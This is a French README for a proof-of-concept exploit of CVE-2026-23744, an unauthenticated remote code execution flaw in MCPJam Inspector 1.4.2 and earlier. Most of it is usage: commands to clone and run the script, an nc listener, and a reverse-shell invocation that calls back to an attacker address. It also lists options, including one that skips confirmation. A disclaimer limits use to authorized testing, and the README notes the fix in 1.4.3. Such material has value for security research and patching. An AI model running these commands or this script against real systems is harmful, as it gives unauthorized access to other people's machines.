
Preuve de concept d'exécution de code à distance sans authentification pour CVE-2026-23744 ciblant MCPJam Inspector. Génère des charges utiles MCP serverConfig conçues pour exploiter le endpoint /api/mcp/connect avec prise en charge du shell inversé et du débogage en dry-run.
PoC d'exécution de code à distance non authentifié pour CVE-2026-23744. MCPJam Inspector 1.4.2 et versions antérieures exposent une fonctionnalité via /api/mcp/connect qui peut lancer une commande de serveur MCP contrôlée par un attaquant sans authentification.
Uniquement pour les tests et la recherche autorisés. Ne pas utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
serverConfig conçue./api/mcp/connect non authentifié.bash -c.


git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--cmd 'id'
Démarrez d'abord un écouteur :
rlwrap nc -lvnp 4444
Exécutez ensuite :
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--reverse-shell \
--lhost 10.10.16.53 \
--lport 4444
Options utiles :
--cmd COMMAND Command to execute (default: id)
--server-id VALUE serverId value in the crafted MCP config (default: pwn)
--dry-run Build payload flow without sending the HTTP request
--debug Print endpoint and JSON payload
--verify-tls Verify HTTPS certificates
--timeout SECONDS HTTP timeout in seconds (default: 8)
--yes Skip reverse-shell confirmation prompt
| Produit | Version affectée | Accès requis | Impact |
|---|---|---|---|
| MCPJam Inspector | <= 1.4.2 | Aucun | Exécution de commande à distance en tant qu'utilisateur du processus MCPJam Inspector |
Le problème est particulièrement exposé lorsque MCPJam Inspector écoute sur 0.0.0.0, permettant aux hôtes distants d'atteindre le service de développement.
/api/mcp/connect.serverConfig.command et serverConfig.args.--cmd pour une validation sécurisée avant de tenter un reverse shell.--dry-run --debug pour inspecter la requête générée sans toucher à une cible.1.4.3 contient le correctif amont selon le NVD.ozcanpng — github.com/ozcanpng — ozcanpng.dev